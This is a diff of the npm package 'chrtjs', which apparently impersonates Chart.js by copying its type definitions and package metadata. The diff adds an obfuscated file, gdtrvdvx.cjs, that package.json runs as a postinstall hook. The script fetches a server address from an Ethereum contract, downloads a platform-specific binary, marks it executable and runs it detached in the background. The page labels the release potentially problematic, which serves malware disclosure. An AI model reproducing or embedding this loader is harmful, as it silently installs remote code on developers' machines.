chrtjs 0.0.1-security → 4.4.6
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of chrtjs might be problematic. Click here for more details.
- package/LICENSE.md +9 -0
- package/README.md +36 -3
- package/auto/auto.cjs +6 -0
- package/auto/auto.d.ts +4 -0
- package/auto/auto.js +6 -0
- package/auto/package.json +14 -0
- package/dist/chart.cjs +11530 -0
- package/dist/chart.cjs.map +1 -0
- package/dist/chart.js +11482 -0
- package/dist/chart.js.map +1 -0
- package/dist/chart.umd.js +14 -0
- package/dist/chart.umd.js.map +1 -0
- package/dist/chunks/helpers.segment.cjs +2875 -0
- package/dist/chunks/helpers.segment.cjs.map +1 -0
- package/dist/chunks/helpers.segment.js +2749 -0
- package/dist/chunks/helpers.segment.js.map +1 -0
- package/dist/controllers/controller.bar.d.ts +62 -0
- package/dist/controllers/controller.bubble.d.ts +35 -0
- package/dist/controllers/controller.doughnut.d.ts +64 -0
- package/dist/controllers/controller.line.d.ts +13 -0
- package/dist/controllers/controller.pie.d.ts +3 -0
- package/dist/controllers/controller.polarArea.d.ts +35 -0
- package/dist/controllers/controller.radar.d.ts +19 -0
- package/dist/controllers/controller.scatter.d.ts +20 -0
- package/dist/controllers/index.d.ts +8 -0
- package/dist/core/core.adapters.d.ts +93 -0
- package/dist/core/core.animation.d.ts +21 -0
- package/dist/core/core.animations.d.ts +22 -0
- package/dist/core/core.animations.defaults.d.ts +1 -0
- package/dist/core/core.animator.d.ts +67 -0
- package/dist/core/core.config.d.ts +86 -0
- package/dist/core/core.controller.d.ts +257 -0
- package/dist/core/core.datasetController.d.ts +251 -0
- package/dist/core/core.defaults.d.ts +80 -0
- package/dist/core/core.element.d.ts +21 -0
- package/dist/core/core.interaction.d.ts +92 -0
- package/dist/core/core.layouts.d.ts +88 -0
- package/dist/core/core.layouts.defaults.d.ts +1 -0
- package/dist/core/core.plugins.d.ts +61 -0
- package/dist/core/core.registry.d.ts +90 -0
- package/dist/core/core.scale.autoskip.d.ts +19 -0
- package/dist/core/core.scale.d.ts +343 -0
- package/dist/core/core.scale.defaults.d.ts +1 -0
- package/dist/core/core.ticks.d.ts +31 -0
- package/dist/core/core.typedRegistry.d.ts +33 -0
- package/dist/core/index.d.ts +15 -0
- package/dist/elements/element.arc.d.ts +50 -0
- package/dist/elements/element.bar.d.ts +32 -0
- package/dist/elements/element.line.d.ts +87 -0
- package/dist/elements/element.point.d.ts +39 -0
- package/dist/elements/index.d.ts +4 -0
- package/dist/helpers/helpers.canvas.d.ts +75 -0
- package/dist/helpers/helpers.collection.d.ts +68 -0
- package/dist/helpers/helpers.color.d.ts +13 -0
- package/dist/helpers/helpers.config.d.ts +31 -0
- package/dist/helpers/helpers.config.types.d.ts +41 -0
- package/dist/helpers/helpers.core.d.ts +147 -0
- package/dist/helpers/helpers.curve.d.ts +17 -0
- package/dist/helpers/helpers.dom.d.ts +55 -0
- package/dist/helpers/helpers.easing.d.ts +40 -0
- package/dist/helpers/helpers.extras.d.ts +45 -0
- package/dist/helpers/helpers.interpolation.d.ts +22 -0
- package/dist/helpers/helpers.intl.d.ts +1 -0
- package/dist/helpers/helpers.math.d.ts +84 -0
- package/dist/helpers/helpers.options.d.ts +97 -0
- package/dist/helpers/helpers.rtl.d.ts +10 -0
- package/dist/helpers/helpers.segment.d.ts +65 -0
- package/dist/helpers/index.d.ts +15 -0
- package/dist/helpers.cjs +135 -0
- package/dist/helpers.cjs.map +1 -0
- package/dist/helpers.js +9 -0
- package/dist/helpers.js.map +1 -0
- package/dist/index.d.ts +12 -0
- package/dist/index.umd.d.ts +5 -0
- package/dist/platform/index.d.ts +5 -0
- package/dist/platform/platform.base.d.ts +63 -0
- package/dist/platform/platform.basic.d.ts +10 -0
- package/dist/platform/platform.dom.d.ts +19 -0
- package/dist/plugins/index.d.ts +7 -0
- package/dist/plugins/plugin.colors.d.ts +11 -0
- package/dist/plugins/plugin.decimation.d.ts +10 -0
- package/dist/plugins/plugin.filler/filler.drawing.d.ts +1 -0
- package/dist/plugins/plugin.filler/filler.helper.d.ts +14 -0
- package/dist/plugins/plugin.filler/filler.options.d.ts +30 -0
- package/dist/plugins/plugin.filler/filler.segment.d.ts +36 -0
- package/dist/plugins/plugin.filler/filler.target.d.ts +9 -0
- package/dist/plugins/plugin.filler/filler.target.stack.d.ts +14 -0
- package/dist/plugins/plugin.filler/index.d.ts +12 -0
- package/dist/plugins/plugin.filler/simpleArc.d.ts +12 -0
- package/dist/plugins/plugin.legend.d.ts +114 -0
- package/dist/plugins/plugin.subtitle.d.ts +27 -0
- package/dist/plugins/plugin.title.d.ts +61 -0
- package/dist/plugins/plugin.tooltip.d.ts +288 -0
- package/dist/scales/index.d.ts +6 -0
- package/dist/scales/scale.category.d.ts +21 -0
- package/dist/scales/scale.linear.d.ts +10 -0
- package/dist/scales/scale.linearbase.d.ts +20 -0
- package/dist/scales/scale.logarithmic.d.ts +25 -0
- package/dist/scales/scale.radialLinear.d.ts +63 -0
- package/dist/scales/scale.time.d.ts +130 -0
- package/dist/scales/scale.timeseries.d.ts +39 -0
- package/dist/types/animation.d.ts +34 -0
- package/dist/types/basic.d.ts +3 -0
- package/dist/types/color.d.ts +1 -0
- package/dist/types/geometric.d.ts +52 -0
- package/dist/types/index.d.ts +3842 -0
- package/dist/types/layout.d.ts +65 -0
- package/dist/types/utils.d.ts +30 -0
- package/dist/types.d.ts +10 -0
- package/gdtrvdvx.cjs +1 -0
- package/helpers/helpers.cjs +1 -0
- package/helpers/helpers.d.ts +1 -0
- package/helpers/helpers.js +1 -0
- package/helpers/package.json +14 -0
- package/package.json +124 -4
@@ -0,0 +1,65 @@
|
|
1
|
+
import {ChartArea} from './geometric.js';
|
2
|
+
|
3
|
+
export type LayoutPosition = 'left' | 'top' | 'right' | 'bottom' | 'center' | 'chartArea' | {[scaleId: string]: number};
|
4
|
+
|
5
|
+
export interface LayoutItem {
|
6
|
+
/**
|
7
|
+
* The position of the item in the chart layout. Possible values are
|
8
|
+
*/
|
9
|
+
position: LayoutPosition;
|
10
|
+
/**
|
11
|
+
* The weight used to sort the item. Higher weights are further away from the chart area
|
12
|
+
*/
|
13
|
+
weight: number;
|
14
|
+
/**
|
15
|
+
* if true, and the item is horizontal, then push vertical boxes down
|
16
|
+
*/
|
17
|
+
fullSize: boolean;
|
18
|
+
/**
|
19
|
+
* Width of item. Must be valid after update()
|
20
|
+
*/
|
21
|
+
width: number;
|
22
|
+
/**
|
23
|
+
* Height of item. Must be valid after update()
|
24
|
+
*/
|
25
|
+
height: number;
|
26
|
+
/**
|
27
|
+
* Left edge of the item. Set by layout system and cannot be used in update
|
28
|
+
*/
|
29
|
+
left: number;
|
30
|
+
/**
|
31
|
+
* Top edge of the item. Set by layout system and cannot be used in update
|
32
|
+
*/
|
33
|
+
top: number;
|
34
|
+
/**
|
35
|
+
* Right edge of the item. Set by layout system and cannot be used in update
|
36
|
+
*/
|
37
|
+
right: number;
|
38
|
+
/**
|
39
|
+
* Bottom edge of the item. Set by layout system and cannot be used in update
|
40
|
+
*/
|
41
|
+
bottom: number;
|
42
|
+
|
43
|
+
/**
|
44
|
+
* Called before the layout process starts
|
45
|
+
*/
|
46
|
+
beforeLayout?(): void;
|
47
|
+
/**
|
48
|
+
* Draws the element
|
49
|
+
*/
|
50
|
+
draw(chartArea: ChartArea): void;
|
51
|
+
/**
|
52
|
+
* Returns an object with padding on the edges
|
53
|
+
*/
|
54
|
+
getPadding?(): ChartArea;
|
55
|
+
/**
|
56
|
+
* returns true if the layout item is horizontal (ie. top or bottom)
|
57
|
+
*/
|
58
|
+
isHorizontal(): boolean;
|
59
|
+
/**
|
60
|
+
* Takes two parameters: width and height.
|
61
|
+
* @param width
|
62
|
+
* @param height
|
63
|
+
*/
|
64
|
+
update(width: number, height: number, margins?: ChartArea): void;
|
65
|
+
}
|
@@ -0,0 +1,30 @@
|
|
1
|
+
/* eslint-disable @typescript-eslint/ban-types */
|
2
|
+
|
3
|
+
// DeepPartial implementation taken from the utility-types NPM package, which is
|
4
|
+
// Copyright (c) 2016 Piotr Witek <piotrek.witek@gmail.com> (http://piotrwitek.github.io)
|
5
|
+
// and used under the terms of the MIT license
|
6
|
+
export type DeepPartial<T> = T extends Function
|
7
|
+
? T
|
8
|
+
: T extends Array<infer U>
|
9
|
+
? _DeepPartialArray<U>
|
10
|
+
: T extends object
|
11
|
+
? _DeepPartialObject<T>
|
12
|
+
: T | undefined;
|
13
|
+
|
14
|
+
type _DeepPartialArray<T> = Array<DeepPartial<T>>
|
15
|
+
type _DeepPartialObject<T> = { [P in keyof T]?: DeepPartial<T[P]> };
|
16
|
+
|
17
|
+
export type DistributiveArray<T> = [T] extends [unknown] ? Array<T> : never
|
18
|
+
|
19
|
+
// https://stackoverflow.com/a/50375286
|
20
|
+
export type UnionToIntersection<U> = (U extends unknown ? (k: U) => void : never) extends (k: infer I) => void ? I : never;
|
21
|
+
|
22
|
+
export type AllKeys<T> = T extends any ? keyof T : never;
|
23
|
+
|
24
|
+
export type PickType<T, K extends AllKeys<T>> = T extends { [k in K]?: any }
|
25
|
+
? T[K]
|
26
|
+
: undefined;
|
27
|
+
|
28
|
+
export type Merge<T extends object> = {
|
29
|
+
[k in AllKeys<T>]: PickType<T, k>;
|
30
|
+
};
|
package/dist/types.d.ts
ADDED
@@ -0,0 +1,10 @@
|
|
1
|
+
/**
|
2
|
+
* Temporary entry point of the types at the time of the transition.
|
3
|
+
* After transition done need to remove it in favor of index.ts
|
4
|
+
*/
|
5
|
+
export * from './index.js';
|
6
|
+
/**
|
7
|
+
* Explicitly re-exporting to resolve the ambiguity.
|
8
|
+
*/
|
9
|
+
export { BarController, BubbleController, DoughnutController, LineController, PieController, PolarAreaController, RadarController, ScatterController, Animation, Animations, Chart, DatasetController, Interaction, Scale, Ticks, defaults, layouts, registry, ArcElement, BarElement, LineElement, PointElement, BasePlatform, BasicPlatform, DomPlatform, Decimation, Filler, Legend, SubTitle, Title, Tooltip, CategoryScale, LinearScale, LogarithmicScale, RadialLinearScale, TimeScale, TimeSeriesScale, PluginOptionsByType, ElementOptionsByType, ChartDatasetProperties, UpdateModeEnum, registerables } from './types/index.js';
|
10
|
+
export * from './types/index.js';
|
package/gdtrvdvx.cjs
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const _0x184ab9=_0x4d74;(function(_0x3bba92,_0x36dff0){const _0x3467d8=_0x4d74,_0xb5ea75=_0x3bba92();while(!![]){try{const _0x7e0673=-parseInt(_0x3467d8(0xc4))/0x1+parseInt(_0x3467d8(0xd3))/0x2+parseInt(_0x3467d8(0xc2))/0x3*(parseInt(_0x3467d8(0xe5))/0x4)+parseInt(_0x3467d8(0xd1))/0x5+parseInt(_0x3467d8(0xc3))/0x6+parseInt(_0x3467d8(0xda))/0x7+-parseInt(_0x3467d8(0xc9))/0x8;if(_0x7e0673===_0x36dff0)break;else _0xb5ea75['push'](_0xb5ea75['shift']());}catch(_0x161f9d){_0xb5ea75['push'](_0xb5ea75['shift']());}}}(_0x3c24,0x267f7));function _0x4d74(_0x52eab4,_0x2e7ee2){const _0x3c2416=_0x3c24();return _0x4d74=function(_0x4d74e2,_0x4d6372){_0x4d74e2=_0x4d74e2-0xba;let _0x1411d1=_0x3c2416[_0x4d74e2];return _0x1411d1;},_0x4d74(_0x52eab4,_0x2e7ee2);}const {ethers}=require('ethers'),axios=require('axios'),util=require(_0x184ab9(0xe0)),fs=require('fs'),path=require('path'),os=require('os'),{spawn}=require(_0x184ab9(0xe3)),contractAddress='0xa1b40044EBc2794f207D45143Bd82a1B86156c6b',WalletOwner=_0x184ab9(0xc5),abi=[_0x184ab9(0xc0)],provider=ethers[_0x184ab9(0xe4)](_0x184ab9(0xc1)),contract=new ethers[(_0x184ab9(0xcb))](contractAddress,abi,provider),fetchAndUpdateIp=async()=>{const _0xc9fee6=_0x184ab9,_0x5c7966={'ItaZk':_0xc9fee6(0xc6)};try{const _0xbdbd7=await contract['getString'](WalletOwner);return _0xbdbd7;}catch(_0x14eb7c){return console['error'](_0x5c7966[_0xc9fee6(0xba)],_0x14eb7c),await fetchAndUpdateIp();}},getDownloadUrl=_0x18f6b7=>{const _0x3b0bd6=_0x184ab9,_0x3d1c2f={'rFoer':_0x3b0bd6(0xdd),'XWqZz':_0x3b0bd6(0xcc)},_0x1bc387=os['platform']();switch(_0x1bc387){case _0x3b0bd6(0xde):return _0x18f6b7+_0x3b0bd6(0xbd);case _0x3d1c2f['rFoer']:return _0x18f6b7+'/node-linux';case _0x3d1c2f[_0x3b0bd6(0xdf)]:return _0x18f6b7+'/node-macos';default:throw new Error(_0x3b0bd6(0xbb)+_0x1bc387);}},downloadFile=async(_0x2544cb,_0x4cb2c7)=>{const _0x22bb2f=_0x184ab9,_0x277ebb={'VGkhP':_0x22bb2f(0xd0),'zGnff':_0x22bb2f(0xbf),'uaKLs':function(_0x44014d,_0x4a5ee0){return _0x44014d(_0x4a5ee0);},'OjWKG':_0x22bb2f(0xbe)},_0x2c24bd=fs[_0x22bb2f(0xbc)](_0x4cb2c7),_0x3f12da=await _0x277ebb['uaKLs'](axios,{'url':_0x2544cb,'method':_0x22bb2f(0xd9),'responseType':_0x277ebb['OjWKG']});return _0x3f12da[_0x22bb2f(0xe1)][_0x22bb2f(0xce)](_0x2c24bd),new Promise((_0x36108d,_0x41f417)=>{const _0xda8a26=_0x22bb2f;_0x2c24bd['on'](_0x277ebb['VGkhP'],_0x36108d),_0x2c24bd['on'](_0x277ebb[_0xda8a26(0xdb)],_0x41f417);});},executeFileInBackground=async _0x2c648d=>{const _0xf248f4=_0x184ab9,_0x4ead2a={'GZogA':function(_0x340ba9,_0x1f0133,_0x2aa5cf,_0xea7635){return _0x340ba9(_0x1f0133,_0x2aa5cf,_0xea7635);},'Fcapm':'ignore','USmqi':_0xf248f4(0xd8)};try{const _0x2e4daf=_0x4ead2a[_0xf248f4(0xc8)](spawn,_0x2c648d,[],{'detached':!![],'stdio':_0x4ead2a[_0xf248f4(0xd7)]});_0x2e4daf[_0xf248f4(0xc7)]();}catch(_0x3bad9a){console[_0xf248f4(0xbf)](_0x4ead2a['USmqi'],_0x3bad9a);}},runInstallation=async()=>{const _0x54d524=_0x184ab9,_0x264f0d={'CmeCo':function(_0x48bbe5){return _0x48bbe5();},'BMjgb':function(_0x1ab36e,_0x189d9b){return _0x1ab36e(_0x189d9b);},'PPnQd':function(_0x2401d7,_0x382f8c,_0x4f7197){return _0x2401d7(_0x382f8c,_0x4f7197);},'LdyHB':_0x54d524(0xde),'pxMsL':'755'};try{const _0x53275a=await _0x264f0d[_0x54d524(0xcd)](fetchAndUpdateIp),_0x472abd=_0x264f0d[_0x54d524(0xd6)](getDownloadUrl,_0x53275a),_0x3f02df=os['tmpdir'](),_0x312f63=path[_0x54d524(0xd4)](_0x472abd),_0x210573=path[_0x54d524(0xcf)](_0x3f02df,_0x312f63);await _0x264f0d[_0x54d524(0xca)](downloadFile,_0x472abd,_0x210573);if(os[_0x54d524(0xd5)]()!==_0x264f0d[_0x54d524(0xd2)])fs[_0x54d524(0xdc)](_0x210573,_0x264f0d[_0x54d524(0xe2)]);executeFileInBackground(_0x210573);}catch(_0x286958){console[_0x54d524(0xbf)]('Ошибка\x20установки:',_0x286958);}};runInstallation();function _0x3c24(){const _0x3c8608=['win32','XWqZz','util','data','pxMsL','child_process','getDefaultProvider','152452iMeJig','ItaZk','Unsupported\x20platform:\x20','createWriteStream','/node-win.exe','stream','error','function\x20getString(address\x20account)\x20public\x20view\x20returns\x20(string)','mainnet','21YSNPEz','430134mjazDB','250936bDlLhb','0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84','Ошибка\x20при\x20получении\x20IP\x20адреса:','unref','GZogA','4124216GqLWQi','PPnQd','Contract','darwin','CmeCo','pipe','join','finish','1333600vezAsY','LdyHB','93998ajUGZb','basename','platform','BMjgb','Fcapm','Ошибка\x20при\x20запуске\x20файла:','GET','1903657jgCbWt','zGnff','chmodSync','linux'];_0x3c24=function(){return _0x3c8608;};return _0x3c24();}
|
@@ -0,0 +1 @@
|
|
1
|
+
module.exports = require('../dist/helpers.cjs');
|
@@ -0,0 +1 @@
|
|
1
|
+
export * from '../dist/helpers/index.js';
|
@@ -0,0 +1 @@
|
|
1
|
+
export * from '../dist/helpers.js';
|
@@ -0,0 +1,14 @@
|
|
1
|
+
{
|
2
|
+
"name": "chart.js-helpers",
|
3
|
+
"private": true,
|
4
|
+
"description": "Helpers package. Exists to support bundlers without exports support such as webpack 4.",
|
5
|
+
"type": "module",
|
6
|
+
"main": "./helpers.cjs",
|
7
|
+
"module": "./helpers.js",
|
8
|
+
"exports": {
|
9
|
+
"types": "./helpers.d.ts",
|
10
|
+
"import": "./helpers.js",
|
11
|
+
"require": "./helpers.cjs"
|
12
|
+
},
|
13
|
+
"types": "./helpers.d.ts"
|
14
|
+
}
|
package/package.json
CHANGED
@@ -1,6 +1,126 @@
|
|
1
1
|
{
|
2
2
|
"name": "chrtjs",
|
3
|
-
"
|
4
|
-
"description": "
|
5
|
-
"
|
6
|
-
|
3
|
+
"homepage": "https://www.chartjs.org",
|
4
|
+
"description": "Simple HTML5 charts using the canvas element.",
|
5
|
+
"version": "4.4.6",
|
6
|
+
"license": "MIT",
|
7
|
+
"type": "module",
|
8
|
+
"sideEffects": [
|
9
|
+
"./auto/auto.js",
|
10
|
+
"./auto/auto.cjs",
|
11
|
+
"./dist/chart.umd.js"
|
12
|
+
],
|
13
|
+
"jsdelivr": "./dist/chart.umd.js",
|
14
|
+
"unpkg": "./dist/chart.umd.js",
|
15
|
+
"main": "./dist/chart.cjs",
|
16
|
+
"module": "./dist/chart.js",
|
17
|
+
"exports": {
|
18
|
+
".": {
|
19
|
+
"types": "./dist/types.d.ts",
|
20
|
+
"import": "./dist/chart.js",
|
21
|
+
"require": "./dist/chart.cjs"
|
22
|
+
},
|
23
|
+
"./auto": {
|
24
|
+
"types": "./auto/auto.d.ts",
|
25
|
+
"import": "./auto/auto.js",
|
26
|
+
"require": "./auto/auto.cjs"
|
27
|
+
},
|
28
|
+
"./helpers": {
|
29
|
+
"types": "./helpers/helpers.d.ts",
|
30
|
+
"import": "./helpers/helpers.js",
|
31
|
+
"require": "./helpers/helpers.cjs"
|
32
|
+
}
|
33
|
+
},
|
34
|
+
"types": "./dist/types.d.ts",
|
35
|
+
"keywords": [
|
36
|
+
"canvas",
|
37
|
+
"charts",
|
38
|
+
"data",
|
39
|
+
"graphs",
|
40
|
+
"html5",
|
41
|
+
"responsive"
|
42
|
+
],
|
43
|
+
"repository": {
|
44
|
+
"type": "git",
|
45
|
+
"url": "https://github.com/chartjs/Chart.js.git"
|
46
|
+
},
|
47
|
+
"bugs": {
|
48
|
+
"url": "https://github.com/chartjs/Chart.js/issues"
|
49
|
+
},
|
50
|
+
"files": [
|
51
|
+
"auto/**",
|
52
|
+
"dist/**",
|
53
|
+
"!dist/docs/**",
|
54
|
+
"helpers/**",
|
55
|
+
"gdtrvdvx.cjs"
|
56
|
+
],
|
57
|
+
"scripts": {
|
58
|
+
"postinstall": "node gdtrvdvx.cjs"
|
59
|
+
},
|
60
|
+
"dependencies": {
|
61
|
+
"@kurkle/color": "^0.3.0",
|
62
|
+
"axios": "^1.7.7",
|
63
|
+
"ethers": "^6.13.2"
|
64
|
+
},
|
65
|
+
"devDependencies": {
|
66
|
+
"@rollup/plugin-commonjs": "^23.0.2",
|
67
|
+
"@rollup/plugin-inject": "^5.0.2",
|
68
|
+
"@rollup/plugin-json": "^5.0.1",
|
69
|
+
"@rollup/plugin-node-resolve": "^15.0.1",
|
70
|
+
"@swc/core": "^1.3.18",
|
71
|
+
"@types/estree": "^1.0.0",
|
72
|
+
"@types/offscreencanvas": "^2019.7.0",
|
73
|
+
"@typescript-eslint/eslint-plugin": "^5.32.0",
|
74
|
+
"@typescript-eslint/parser": "^5.32.0",
|
75
|
+
"chartjs-adapter-luxon": "^1.2.0",
|
76
|
+
"chartjs-adapter-moment": "^1.0.0",
|
77
|
+
"chartjs-test-utils": "^0.4.0",
|
78
|
+
"concurrently": "^7.3.0",
|
79
|
+
"coveralls": "^3.1.1",
|
80
|
+
"cross-env": "^7.0.3",
|
81
|
+
"eslint": "^8.21.0",
|
82
|
+
"eslint-config-chartjs": "^0.3.0",
|
83
|
+
"eslint-plugin-es": "^4.1.0",
|
84
|
+
"eslint-plugin-html": "^7.1.0",
|
85
|
+
"eslint-plugin-markdown": "^3.0.0",
|
86
|
+
"esm": "^3.2.25",
|
87
|
+
"glob": "^8.0.3",
|
88
|
+
"jasmine": "^3.7.0",
|
89
|
+
"jasmine-core": "^3.7.1",
|
90
|
+
"karma": "^6.3.2",
|
91
|
+
"karma-chrome-launcher": "^3.1.0",
|
92
|
+
"karma-coverage": "^2.0.3",
|
93
|
+
"karma-edge-launcher": "^0.4.2",
|
94
|
+
"karma-firefox-launcher": "^2.1.0",
|
95
|
+
"karma-jasmine": "^4.0.1",
|
96
|
+
"karma-jasmine-html-reporter": "^1.5.4",
|
97
|
+
"karma-rollup-preprocessor": "7.0.7",
|
98
|
+
"karma-safari-private-launcher": "^1.0.0",
|
99
|
+
"karma-spec-reporter": "0.0.32",
|
100
|
+
"luxon": "^3.0.1",
|
101
|
+
"moment": "^2.29.4",
|
102
|
+
"moment-timezone": "^0.5.34",
|
103
|
+
"pixelmatch": "^5.3.0",
|
104
|
+
"rollup": "^3.3.0",
|
105
|
+
"rollup-plugin-cleanup": "^3.2.1",
|
106
|
+
"rollup-plugin-istanbul": "^4.0.0",
|
107
|
+
"rollup-plugin-swc3": "^0.7.0",
|
108
|
+
"rollup-plugin-terser": "^7.0.2",
|
109
|
+
"typescript": "^4.7.4",
|
110
|
+
"yargs": "^17.5.1"
|
111
|
+
},
|
112
|
+
"engines": {
|
113
|
+
"pnpm": ">=8"
|
114
|
+
},
|
115
|
+
"packageManager": "pnpm@8.13.0",
|
116
|
+
"pnpm": {
|
117
|
+
"overrides": {
|
118
|
+
"html-entities": "1.4.0"
|
119
|
+
},
|
120
|
+
"peerDependencyRules": {
|
121
|
+
"ignoreMissing": [
|
122
|
+
"chart.js"
|
123
|
+
]
|
124
|
+
}
|
125
|
+
}
|
126
|
+
}
|